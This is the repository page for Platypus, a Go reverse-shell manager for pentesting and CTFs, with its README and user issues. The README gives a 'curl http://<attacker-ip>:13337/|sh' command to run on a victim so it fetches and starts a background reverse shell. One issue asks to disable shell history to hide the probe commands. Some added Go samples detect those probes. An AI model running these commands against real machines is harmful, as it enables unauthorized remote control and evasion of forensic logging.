wangyihang / platypus

:hammer: A modern multiple reverse shell sessions manager written in go

Home Page: http://platypus-reverse-shell.vercel.app

License: GNU Lesser General Public License v3.0

Go 68.53% Dockerfile 0.46% Smarty 1.22% JavaScript 19.85% TypeScript 7.15% SCSS 0.50% HTML 0.71% CSS 0.59% Makefile 0.99%
reverse-shell ctf attack-defense reverse-shell-as-a-service pentesting pentesting-tools red-team

platypus's Introduction

Platypus

A modern multiple reverse shell sessions/clients manager via terminal written in go

Features

  • Multiple service listening ports
  • Multiple client connections
  • RESTful API
  • Python SDK
  • Reverse shell as a service (Pop a reverse shell in multiple languages without remembering idle commands)
  • Download/Upload file with progress bar
  • Full interactive shell
    • Using vim gracefully in reverse shell
    • Using CTRL+C and CTRL+Z in reverse shell
  • Start servers automatically
  • Port forwarding
  • Initialize from configuration file
  • Web UI

Documents

Get Started

There are multiple ways to run this tool; feel free to choose one of the following methods.

Install requirements for running (Optional)

sudo apt install upx

Run Platypus from source code

git clone https://github.com/WangYihang/Platypus
cd Platypus
sudo apt install -y make curl
make install_dependency
make release

Run Platypus from docker-compose

docker-compose up -d
# Method 1: enter the cli of platypus
docker-compose exec app tmux a -t platypus
# Method 2: enter the web ui of platypus
firefox http://127.0.0.1:7331/

Run Platypus from release binaries

  1. Download a prebuilt Platypus binary from the project's releases page
  2. Run the downloaded executable file

Usage

Network Topology

  • Attack IP: 192.168.88.129
    • Reverse Shell Service: 0.0.0.0:13337
    • Reverse Shell Service: 0.0.0.0:13338
    • RESTful Service: 127.0.0.1:7331
  • Victim IP: 192.168.88.130

Give it a try

First, run ./Platypus. A config.yml will be generated automatically, and the config file is simple enough to read at a glance.

servers: 
  - host: "0.0.0.0"
    port: 13337
    # Platypus is able to use several properties as the unique identifier (primary key) of a single client.
    # All available properties are listed below:
    # `%i` IP
    # `%u` Username
    # `%m` MAC address
    # `%o` Operating System
    # `%t` Incoming connection timestamp
    hashFormat: "%i %u %m %o"
  - host: "0.0.0.0"
    port: 13338
    # Using TimeStamp allows us to track all connections from the same IP / Username / OS and MAC.
    hashFormat: "%i %u %m %o %t"
restful:
  host: "127.0.0.1"
  port: 7331
  enable: true
# Check new releases from GitHub when starting Platypus
update: false

As you can see, Platypus will check for updates, then start listening on ports 13337, 13338 and 7331.

The three ports serve different purposes.

  • 13337 Reverse shell server, which disallows multiple reverse sessions coming from the same IP.
  • 13338 Reverse shell server, which allows multiple reverse sessions coming from the same IP.
  • 7331 Platypus RESTful API endpoint, which allows you to control Platypus over HTTP or through the Python SDK.

If you want another reverse shell listening port, just type Run 0.0.0.0 1339 or modify config.yml.

Platypus will also print help information about RaaS, which frees you from remembering tedious reverse shell commands.

With Platypus, all you have to do is copy and paste the curl command and execute it on the victim machine.

curl http://127.0.0.1:13337/|sh
curl http://192.168.88.129:13337/|sh

Now, suppose the victim has been attacked and the reverse shell command is executed on the victim's machine.

Note that the RaaS feature ensures the reverse shell process runs in the background and ignores the hangup signal.

Get started with the Web UI

Manage listening port

Wait for client connection

Popup an interactive shell

Upgrade a reverse shell to an encrypted channel (Termite)

Get started with the CLI

List all victims

You can use the List command to print a table of information about all listening servers and connected clients. Note that port 13337 will reset a connection from the same machine (two connections are considered the same iff they share the same hash value; the information that is hashed can be configured in config.yml). Port 13338 will not reset such connections, which provides more reliability.

Select a victim

The Jump command takes you from one client to another. Use Jump [HASH / Alias] to jump. An alias is an alternative name for a specific client; you can set it via Alias [ALIAS]. When jumping by hash, you do not need to type the whole hash; a prefix of the hash will work.

All commands are case insensitive; feel free to use Tab for completion.

Interactive shell

Interact will pop up a shell, just like netcat.

Download file

Use the Download command to download a file from the reverse shell client to the attacker's machine.

Upload file

Use the Upload command to upload a file to the client you are currently interacting with.

Interactive shell mode

This feature only works on *nix clients.

For a better user experience, we highly RECOMMEND using the Upgrade command to upgrade the plain reverse shell to an encrypted interactive shell.

Platypus tries to spawn /bin/bash via Python, after which the shell is fully interactive (you can use vim, htop and other such tools). First use Jump to select a client, then type PTY, then type Interact to drop into a fully interactive shell. You can simply type exit to leave PTY mode; to avoid the situation in issue #39, you can use platyquit to quit the fully interactive shell mode.

Advanced Usages

  • Reverse shell as a Service (RaaS)
  • RESTful API
  • Python SDK

Other Materials

TODOs

Contributors

This project exists thanks to all the people who contribute.

Backers

Thank you to all our backers! 🙏 [Become a backer]

Sponsors

Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]

404StarLink 2.0 - Galaxy

Platypus has joined 404Team 404StarLink 2.0 - Galaxy

platypus's People

Contributors

dependabot[bot], diazole, eddieivan01, lnyzx, monkeywithacupcake, mte0, smidgedy, theremote, tlmn-local, undefined-moe, wangyihang, yeya24, zsxsoft

platypus's Issues

[FEATURE REQUEST] Override node username + Supply node notes

Privilege escalation attacks lead to a changed username, which is not reflected in the server listing. If I use a kernel exploit on a target to achieve root, the server does not update to this username - which is understandable, but makes keeping track of privileged shells a pain. Having the option to override the username of a node while jumped to it would be excellent. One could use "user username" to indicate the current node has the privileges of username

While on the topic, the ability to create brief note snippets to differentiate different shells would be useful - for example, it would be great to tag a node as a shell on a domain controller. One could use a command like "note notehere" to assign a note to the jumped-to client.

[BUG] Switching can cause false switch

Description

If a client of a server is switched, for example to false, while others are true, that will be overruled when switching based on server id, ending with all nodes in the same state. 

Reproduce

  1. go run platypus.go
  2. Run 0.0.0.0 8080
  3. connect a few reverse shells
  4. switch one of them to datadispatch false
  5. switch the server
  6. the one set to false remains at false, as do its peers - causing a loss of "toggleness" to individual switching
  7. switch the server again
  8. all are true - however, two switches should revert all nodes to their original state. The one manually switched to false has had its state of switch lost.
    ...

Expected behavior

Each node is set to the inverse of its current datadispatcher state

Current behavior

Some nodes can have their states ignored

Screenshots/Terminal log

A demo of the issue is visible on pastebin: https://pastebin.com/n5zzWH1A

DataDispatcher feature

Send one command to all clients at once (Meta Command)
When dispatching a command with DataDispatcher, echo back the result of the command's execution

Logging Capability

Description

Adding logging capability to command sent, received, and both.

Reproduce

  1. go run platypus.go
  2. Run 0.0.0.0 8080
    ...

Expected behavior

Log commands and its output sent to the client for each specific session folder using hashes/codenames. Add "old_session_list" command to provide the possibility to view previous sessions. Use severity levels to manage your Golang logs volume by separating them into three categories - command sent, output received, and the combination of both.

Current behavior

No logging.

Screenshots/Terminal log

Environments

  • Standard

No echo on Windows reverse shell with WebUI

Description

When interacting with a Windows reverse shell via the WebUI, input is not echoed until the page is refreshed.

Reproduce

  1. ./Platypus_linux_amd64
  2. Execute Remote Shell on Windows client
  3. Launch shell in WebUI
  4. Type dir and hit enter (no echo)
  5. Refresh (see echo'd dir listing)

Expected behavior

Realtime echo of client as is seen in the main application

Current behavior

No echo unless browser is refreshed

Screenshots/Terminal log

N/A

Environments

Server

  • OS: Debian Buster
  • Version: 1.4.1

Client

  • OS: Windows 10

Adding a display current prompt setting

Description

Adding a current session prompt setting showing what session the user is interacting with.

Reproduce

  1. go run platypus.go
  2. Run 0.0.0.0 8080
    ...

Expected behavior

Golden Duck - f4f2b36f04c6e688fb210df160e5acd8: ls
magic1 magic2 magic3

Current behavior

NONE

Screenshots/Terminal log

Environments

  • Standard

--- I am going to attempt at the submitted bug reports. These are not bugs but rather additional capability.

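How to manage sessions coming from the same egress IP?

  • Multiple GameBoxes reach Platypus through the same egress IP, and Platypus keeps only one session, because the connections from the GameBoxes share the same IP and the newly created session is disconnected automatically.
  • Each reverse shell uses a random port, so judging uniqueness by IP + port does not work either.

Question:
Is there any other good way to manage multiple sessions from the same egress IP?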

Docker container in non host mode wrong ip

Description

When using the docker container in non host mode, the external ip is detected as the container's network ip. There should be an optional setter in the config.yml:

  • external ip
  • external domain name (for first time setup for example)

Example:
detected: 172.18.0.2
real: 90.X.X.X (public host ip on e.g. eth0)

Reproduce

docker-compose.yml

version: '3'

services:
  app:
    container_name: platypus
    build: .
    tty: true
    #network_mode: host
    ports:
      - 127.0.0.1:7331:7331
      - 1337-1400:1337-1400
      - 13339:13339
    entrypoint: tmux new -s platypus ./platypus
    volumes:
      - ./config.yml:/app/config-v1.4.2.yml

docker-compose up -d

Expected behavior

IP or domain for connecting each server in the ui is displayed correctly (in list and setup) and services are connectable to the docker host's public ip or domain

Current behavior

IP is falsely claimed to be the docker container's ip in the bridge network. No connection possible at all for reverse shell. Using domains for first time client setup is not possible

Screenshots/Terminal log

screenshot

Environments

  • OS: Ubuntu 18.04.1 LTS
  • Version: 8cf7642 (master-08.07.21)

With kind regards,
miathedev

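Bug after exiting from the PTY shell with exit

Hello:

When I obtain a session and enter an interactive shell via Jump -> PTY -> Interact

and then use the exit command to quit,

a display bug appears and the session is lost.

Test on a public VPS:

image

image

It also falls into an unresponsive state and cannot be exited.

image

Local Kali test:

image

The Web PTY seems to have a similar bug: after exiting with exit, the session cannot be re-entered.

image

However, when entering a session directly via Jump -> Interact and exiting with the exit command,

it returns to the Platypus command interface normally and the session is still kept.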

image

Server creating wizard

  1. Select termite server
  2. Select the target platform
  3. Manage trojans
  4. Select a trojan when Upgrading

Conflict between platypus and various shell exit commands

Description

I've been in a context where I need to exit a shell that has been spawned (let's say shell > pty > mysql), but not go back to platypus itself.
In this context, typing exit will quit the (platypus) interactive mode, yet not exit mysql.
Spawning a new pty (reset attempt) on this session will feed the "pty creation commands" to mysql instead of bash, making this session unusable / bricked.

It would be nice to have platypus exit command bound to something unused, like platyquit, exitplatypus or even goback.
Or maybe add an easy way to rename platypus commands in configuration, like

cmdalias:
  exit: platyquit
  list: ls

image

Thanks so much for this awesome tool/C2, it's 🔥 ! 💟

Fails to start on Mac

Description

Fails to start on Mac

Reproduce

./Platypus_darwin_amd64
[1] 68619 killed ./Platypus_darwin_amd64
...

Expected behavior

Current behavior

Screenshots/Terminal log

Environments

  • OS: mac bigsur
  • Version: 11.5.1

Attach some notes on a client

for example, it would be great to tag a node as a shell on a domain controller. One could use a command like "note notehere" to assign a note to the jumped-to client.

You can try to use the Alias command, the alias of a client can be considered as a short note of it.

I am trying to design the database structures and the frontend of platypus recently, your requirements like note notehere will be implemented in future releases. As you know, currently all data structures are stored in memory instead of a database. It will be useful if all data are stored in a database. At that time, we can easily retrospect on the process of pen-testing. We can even record all interactions of all clients like https://asciinema.org/.

(🐧) 192.168.88.129:40166 [root] » info
+----------------------------------+----------------------+----+------+--------+----------------+-------+---------------+
| HASH                             | NETWORK              | OS | USER | PYTHON | TIME           | ALIAS | GROUPDISPATCH |
+----------------------------------+----------------------+----+------+--------+----------------+-------+---------------+
| aff357164147ff1a675804dce70c5fff | 192.168.88.129:40166 | 🐧 | root | true   | 23 seconds ago |       | true          |
+----------------------------------+----------------------+----+------+--------+----------------+-------+---------------+
(🐧) 192.168.88.129:40166 [root] » alias router
2021/05/07 10:21:25 Renaming session: [aff357164147ff1a675804dce70c5fff] tcp://192.168.88.129:40166 (connected at: 1 minute ago) [🐧] [true]
2021/05/07 10:21:35 A new income connection from 192.168.88.129:40172
2021/05/07 10:21:35 A RaaS request from 192.168.88.129:40172 served
2021/05/07 10:21:35 A new income connection from 192.168.88.129:40174
2021/05/07 10:21:38 Gathering information from client...
2021/05/07 10:21:40 Fire in the hole: [1cb67e3b0999c30aae95bfd73e0cb3bd] tcp://192.168.88.129:40174 [🐧]
[router] (🐧) 192.168.88.129:40166 [root] » Jump 1cb67e3b0999c30aae95bfd73e0cb3bd
2021/05/07 10:21:44 The current interactive shell is set to: [1cb67e3b0999c30aae95bfd73e0cb3bd] tcp://192.168.88.129:40174 (connected at: 9 seconds ago) [🐧] [true]
(🐧) 192.168.88.129:40174 [polaris] » Alias web
2021/05/07 10:21:50 Renaming session: [1cb67e3b0999c30aae95bfd73e0cb3bd] tcp://192.168.88.129:40174 (connected at: 14 seconds ago) [🐧] [true]
[web] (🐧) 192.168.88.129:40174 [polaris] » Jump router
2021/05/07 10:21:54 The current interactive shell is set to: [aff357164147ff1a675804dce70c5fff] tcp://192.168.88.129:40166 (connected at: 2 minutes ago) [🐧] [true]
[router] (🐧) 192.168.88.129:40166 [root] » Jump web
2021/05/07 10:21:56 The current interactive shell is set to: [1cb67e3b0999c30aae95bfd73e0cb3bd] tcp://192.168.88.129:40174 (connected at: 21 seconds ago) [🐧] [true]
[web] (🐧) 192.168.88.129:40174 [polaris] » 

Originally posted by @WangYihang in #40 (comment)

Commands from Platypus are logged in history

# cat /root/.bash_history 
ZNYo3dtcbYNOt9b4
 echo RQ3y2eV3; uname ; echo qpqYIAfb
 echo xcgNrS4G && whoami ; echo 7YLdiFZI
 echo 7beLrQc0 && which python2 ; echo aCH5uwkn
 echo 5b2G5Npm && which python3 ; echo 9o8mTu9N
 echo pPKpsIAF && ls /sys/class/net ; echo BMqqtI4z
 echo b0pgTn4E && ls /sys/class/net/eth0/address ; echo 6tpgrD2j
 echo lFokBgKs && cat /sys/class/net/eth0/address ; echo 1mFQoWqj
 echo gzhoSuVB && ls /sys/class/net/lo/address ; echo uAE7Hlrg
 echo 7FuHpHbV && cat /sys/class/net/lo/address ; echo AjcQHbet

Would it be possible to run unset HISTFILE before doing all the above?
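For defenders, the probe lines in this history have a recognizable shape: a command wrapped between two `echo` calls with 8-character random markers. The following added example (not part of the original issue or of Platypus) scans a shell history for that shape; the function names and the benign sample are constructed, the probe lines are copied from the history above, and the threshold of three hits is an assumption.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// probeRe matches one history line of the form
//   echo <8 alnum> (; or &&) <command> ; echo <8 alnum>
// which is the wrapper visible in the .bash_history excerpt above.
var probeRe = regexp.MustCompile(
	`^\s*echo ([A-Za-z0-9]{8})\s*(?:;|&&)\s*(.+?)\s*;\s*echo ([A-Za-z0-9]{8})\s*$`)

// Hit is one history line that matched the wrapper.
type Hit struct {
	Line    int    // 1-based line number in the history
	Command string // the command between the two markers
}

// Finding is the result of scanning one history file.
type Finding struct {
	Hits       []Hit
	Suspicious bool
}

// ScanHistory collects marker-wrapped commands. A single match can be a
// hand-written one-liner, so the history is only flagged once minHits lines
// match and no marker is ever reused (random markers do not repeat).
func ScanHistory(history string, minHits int) Finding {
	var f Finding
	seen := map[string]bool{}
	for i, line := range strings.Split(history, "\n") {
		m := probeRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		open, cmd, closing := m[1], m[2], m[3]
		if open == closing || seen[open] || seen[closing] {
			continue
		}
		seen[open], seen[closing] = true, true
		f.Hits = append(f.Hits, Hit{Line: i + 1, Command: cmd})
	}
	f.Suspicious = len(f.Hits) >= minHits
	return f
}

// PageSample mixes probe lines copied from the issue above with two
// constructed ordinary commands.
func PageSample() string {
	return strings.Join([]string{
		"ls -la",
		" echo RQ3y2eV3; uname ; echo qpqYIAfb",
		" echo xcgNrS4G && whoami ; echo 7YLdiFZI",
		" echo 7beLrQc0 && which python2 ; echo aCH5uwkn",
		" echo pPKpsIAF && ls /sys/class/net ; echo BMqqtI4z",
		"vim notes.txt",
	}, "\n")
}

// BenignSample is a constructed history whose middle line happens to fit the
// pattern once, which must not be enough to raise a finding.
func BenignSample() string {
	return strings.Join([]string{
		"cd /srv/app",
		"echo starting; make ; echo finished",
		"git status",
	}, "\n")
}

func main() {
	f := ScanHistory(PageSample(), 3)
	fmt.Println("suspicious:", f.Suspicious)
	for _, h := range f.Hits {
		fmt.Printf("  line %d: %s\n", h.Line, h.Command)
	}
	fmt.Println("benign flagged:", ScanHistory(BenignSample(), 3).Suspicious)
}
```

History files are only one source; the same pattern applies to process command-line logs, which still record the commands when the history file is disabled.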

PTY between Windows and Linux

From Windows 10 to Linux, PTY works, but sets terminal rows and columns always both to 0.
So things like nano are not usable.

Clients remain connected on WebUI

Description

When a client is closed down via 'kill' the connection persists in the WebUI

Reproduce

  1. ./Platypus_linux_amd64
  2. curl http://127.0.0.1:3333|sh (on client)
  3. kill -9 <process_id> (on client)
  4. Refresh WebUI

Expected behavior

After a period of time, the connection should be dropped from the WebUI

Current behavior

Client remains available within WebUI until Platypus is closed. Refreshing WebUI persists the connection however won't connect as the shell has been closed on the client.

Screenshots/Terminal log

Environments

  • OS: Debian Buster
  • Version: 1.4.1

Color coding output

Description

Color coding the received stdout to separate the two operations.

Reproduce

  1. go run platypus.go
  2. Run 0.0.0.0 8080
    ...

Expected behavior

Current behavior

Both STDIN and STDOUT have the same color, which can be confusing when interacting within an operation.

Screenshots/Terminal log

Environments

  • Standard.

`DisableHistory` as a config entry of servers.

Seems to be inconsistent between distributions, normally you would get bash commands stored in memory until written to history file. But in this case seems to just disable them completely (which is not bad).
I would leave it personally as you have done and just allow it in the config as I said above.
Let me know what you think.

Good idea!

Originally posted by @WangYihang in #46 (comment)

[FEATURE REQUEST] Add name generator to the session, namely, the `Alias` command

Description

Use a name generator to create a verb + an object to create an easily identifiable session. 
This will allow brains to separate session based on the name. 
Adding a hash next to the ops name will secure the possibility of same code names.

Reproduce

  1. go run platypus.go
  2. Run 0.0.0.0 8080
    ...

Expected behavior

Golden Duck - [f4f2b36f04c6e688fb210df160e5acd8]

Current behavior

f4f2b36f04c6e688fb210df160e5acd8

Screenshots/Terminal log

Environments

  • Standard

The `List` command's output's last field is `Interactive` field

Hey, I have some questions. The List command's output's last field is Interactive field:

>> List
[79809a986dd1c6e38850002f4eb52deb] tcp://127.0.0.1:46536 (connected at: 2 minutes ago) [false]



fmt.Sprintf("[%s] %s://%s (connected at: %s) [%t]", c.Hash, addr.Network(), addr.String(), humanize.Time(c.TimeStamp), c.Interactive)

Should it be the Group instead of Interactive?
In the code, the Interactive field only means if the node is in interactive mode, it's set to true at the beginning of the Interactive command then set back to false at the end, so I can never see the field is false in List command's output
And the Switching set client.Group = !client.Group, the group field means whether to dispatch commands to this client.
Is it a typo? And I think the field name Group is not clear enough

Originally posted by @EddieIvan01 in #6 (comment)

Possible Feature: Command Line Arguments

Is there any way you can add the ability to launch the 'Run IP PORT' command from the command line when you launch platypus? like platypus -Run IP PORT or something?? that way I can have it setup and ready with a simple command, instead of running the application, then giving it commands to listen or whatever...... I hope that makes sense.

Timeout customization

Would be really nice to be able to customize while executing Platypus all the relative timeouts expected once the shell from the victims arrive

ROT13 big issue

Description

Describe your problem here

First of all: I REALLY love this tool!

The tool has a big issue with ROT13 encoding while gathering info from the target, which prevents from identifying the system and so the use of the core upload/ download functions. Can you please take a look into it? It just blocks the core functions.

Reproduce

  1. any tool using ROT13 to decode the incoming commands and to encode the output of the commands
  2. socat to act as a proxy: socat tcp-listen:10000,bind=127.0.0.1,fork,reuseaddr 'system:"stdbuf -o0 tr a-zA-Z n-za-mN-ZA-M | socat - tcp:localhost:10001 | stdbuf -o0 tr a-zA-Z n-za-mN-ZA-M"'
  3. go run platypus.go
  4. Run 127.0.0.1 10001
    ...

Expected behavior

output/ input correctly handled for the commands ran from the tool itself ( uname, etc etc.. )

Current behavior

output/ input not correctly handled ran from the tool itself ( uname, etc etc.. )

Screenshots/Terminal log

image

Environments

  • OS: Linux kali 5.10.0-kali2-amd64 #1 SMP Debian 5.10.9-1kali1 (2021-01-22) x86_64 GNU/Linux
  • Version: 1.5.0

Is there a way to auto start servers?

Great app, is there an environmental variable or something to have it auto start a server on launch?

This is exactly what I was looking for, re: remote systems management behind firewalls. (we own the equipment).

Just might need to learn some go :)

Connection gets terminated

Something going wrong. Connection gets terminated.. I don't think is related to HISTFILE change.

» jump b52b1beba97bfaa7c54e7abeaa3b2f5d
2021/05/18 10:37:40 The current interactive shell is set to: [b52b1beba97bfaa7c54e7abeaa3b2f5d] tcp://xxx.xxx.xxx.xxx:34558 (connected at: 7 minutes ago) [🐧] [true]
(🐧) xxx.xxx.xxx.xxx:34558 [root] » pty
2021/05/18 10:37:43 spawning /bin/bash on the current client
2021/05/18 10:37:43 attcker window size: (378, 63)
2021/05/18 10:37:43 reseting client terminal...
2021/05/18 10:37:43 reseting client SHELL...
2021/05/18 10:37:43 reseting client TERM colors...
2021/05/18 10:37:43 reseting client window size...
(🐧) xxx.xxx.xxx.xxx:34558 [root] » interact
2021/05/18 10:37:45 Interacting with [b52b1beba97bfaa7c54e7abeaa3b2f5d] tcp://xxx.xxx.xxx.xxx:34558 (connected at: 7 minutes ago) [🐧] [true]
2021/05/18 10:37:45 Setting attacker terminal to raw mode

2021/05/18 10:37:46 Write to client failed, 
»

Originally posted by @RAF-87 in #46 (comment)

Makefile doesn't install nvm correctly

Description

When I try to run the Makefile it seems like it installs nvm (line 9) but at 'sudo nvm install --lts'(line 10) it gives me an error that nvm does not exist.

Reproduce

  1. cd Platypus
  2. make
    ...

Expected behavior

Should run and install without an error, I think

Current behavior

Doesn't install nvm correctly

Environments

  • OS: Ubuntu 20.04.2 LTS
  • OS: Ubuntu server 20.04.2
  • OS: Kali 2021.1
  • OS: Parrot 4.11.2
  • OS: Debian 10
  • Version: 1.5.0

Extra

In Line 5 'add-apt-repository...' takes forever but this is due to an ipv6 DNS routing issue which I found out can be solved by deactivating ipv6 until reboot and everything is fine

WebUI unable to connect to firewalled clients

WebUI uses web socket to connect to client machines, however if behind a firewall you receive the following on a loop:

Reconnecting
Connection Closed

Command line version allows interactive shell as normal. Would like to be able to connect via the WebUI to the client using the same approach (ie. no port forwarding needed).

Case insensitive CLI

Could you make the CLI case insensitive? It would be nice to have the option to input help or Help and have the tool function as expected.

can't run/build the source code

Description

can't run/build the source code

Reproduce

  1. go run .\platypus.go
lib\util\compiler\compiler.go:15:2: no required module provides package github.com/WangYihang/Platypus/lib/util/resource; to add it:
        go get github.com/WangYihang/Platypus/lib/util/resource
  1. go get github.com/WangYihang/Platypus/lib/util/resource
go get: module github.com/WangYihang/Platypus/lib/util/resource: reading https://goproxy.cn/github.com/%21wang%21yihang/%21platypus/lib/util/resource/@v/list: 404 Not Found
        server response: not found: module github.com/WangYihang/Platypus/lib/util/resource: no matching versions for query "latest"

...

Environments

  • OS: Win 10 1809
  • Go version: go version go1.16.5 windows/amd64
  • Source version: latest

[Feature Requests] Encryption support.

Description

I would like for the platypus listener to support encryption such as AES or SSL.
Describe your problem here

The Platypus server currently does not support encryption which means the commands are send in cleartext over the network.

Reproduce

  1. go run platypus.go
  2. Run 0.0.0.0 8080
    ...
  3. Encrypt [hash of listener] /path/to/ssl.crt /path/to/ssl.key

Expected behavior

The entire connection has end to end encryption

Current behavior

The connection can be eavesdropped by anyone using a wire sniffer.

Screenshots/Terminal log

Environments

  • OS: Ubuntu 18.04.1 LTS
  • Version: 1.1.0

Pivoting/Tunnelling

It would be nice to be able to use compromised targets as proxies to allow pivoting into a target's network. This feature would greatly improve the utility of the tool and enable it to be used as a flexible and powerful C2 framework for pentesting engagements.

Powershell commands out-of-order or dropped

Description

When using reverse shells from Windows (tested with Powershell, unknown if present in other methods), results from commands (especially the gci or dir command) will often present out-of-order, or omit several of lines of output. 

Reproduce

  1. go run platypus.go
  2. Run 0.0.0.0 8080
  3. Launch a powershell reverse shell of choice towards listener
  4. Interact and use gci command a few times - move directories and try there also
    ...

Expected behavior

Output should be returned as it would directly on the system

Current behavior

Output is sometimes corrupted - lines are out of order or omitted in the response

Crash when access `/api/server`

Description

Describe your problem here

Reproduce

  1. go run platypus.go
  2. curl http://1.3.3.7/api/server

Expected behavior

return servers information

Current behavior

platypus got crash.

Screenshots/Terminal log

2021/08/16 15:50:09 [Recovery] 2021/08/16 - 15:50:09 panic recovered:
json: unsupported type: func() (io.ReadCloser, error)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/render/json.go:59 (0xa546a6)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:841 (0xa5acc8)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:884 (0xaf9b04)
/home/runner/work/Platypus/Platypus/lib/context/restful.go:334 (0xaf99a1)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:161 (0xa6ab90)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/recovery.go:83 (0xa6ab77)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:161 (0xa69c13)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/logger.go:241 (0xa69bd2)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:161 (0xa60d4f)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:409 (0xa60d36)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:367 (0xa607ec)
/opt/hostedtoolcache/go/1.16.5/x64/src/net/http/server.go:2887 (0x798082)
/opt/hostedtoolcache/go/1.16.5/x64/src/net/http/server.go:1952 (0x7934ac)
/opt/hostedtoolcache/go/1.16.5/x64/src/runtime/asm_amd64.s:1371 (0x46e900)

Environments

  • OS: Ubuntu 20.04.1 LTS
  • Version: 1.5.0
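The panic message in this log is what `encoding/json` returns when a value passed to the encoder contains a function-typed field. An added example (not Platypus's code; the `unsafeServer` and `safeServer` types and their field names are hypothetical) that reproduces the error and shows one way to keep such a field out of an API response:

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"strings"
)

// unsafeServer is a hypothetical API model. The exported func field is
// visited by the JSON encoder, which has no encoding for function types.
type unsafeServer struct {
	Host   string                        `json:"host"`
	Port   uint16                        `json:"port"`
	Opener func() (io.ReadCloser, error) `json:"opener"`
}

// safeServer keeps the same data but excludes the func field from JSON.
type safeServer struct {
	Host   string                        `json:"host"`
	Port   uint16                        `json:"port"`
	Opener func() (io.ReadCloser, error) `json:"-"`
}

// opener is a stand-in for whatever callback the real struct might hold.
func opener() (io.ReadCloser, error) {
	return io.NopCloser(strings.NewReader("")), nil
}

// UnsafeSample and SafeSample return constructed values for the demo.
func UnsafeSample() unsafeServer {
	return unsafeServer{Host: "0.0.0.0", Port: 13337, Opener: opener}
}

func SafeSample() safeServer {
	return safeServer{Host: "0.0.0.0", Port: 13337, Opener: opener}
}

// Encode marshals v and reports whether a failure was caused by a Go type
// that JSON cannot represent, so a handler can answer with an error status
// instead of letting the renderer panic.
func Encode(v interface{}) (body string, unsupported bool, err error) {
	b, err := json.Marshal(v)
	var ute *json.UnsupportedTypeError
	if errors.As(err, &ute) {
		return "", true, err
	}
	return string(b), false, err
}

func main() {
	_, unsupported, err := Encode(UnsafeSample())
	fmt.Println("unsafe:", unsupported, err)

	body, _, err := Encode(SafeSample())
	fmt.Println("safe:  ", body, err)
}
```

A unit test that marshals every type returned by the REST handlers catches this class of error before it reaches a running server.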
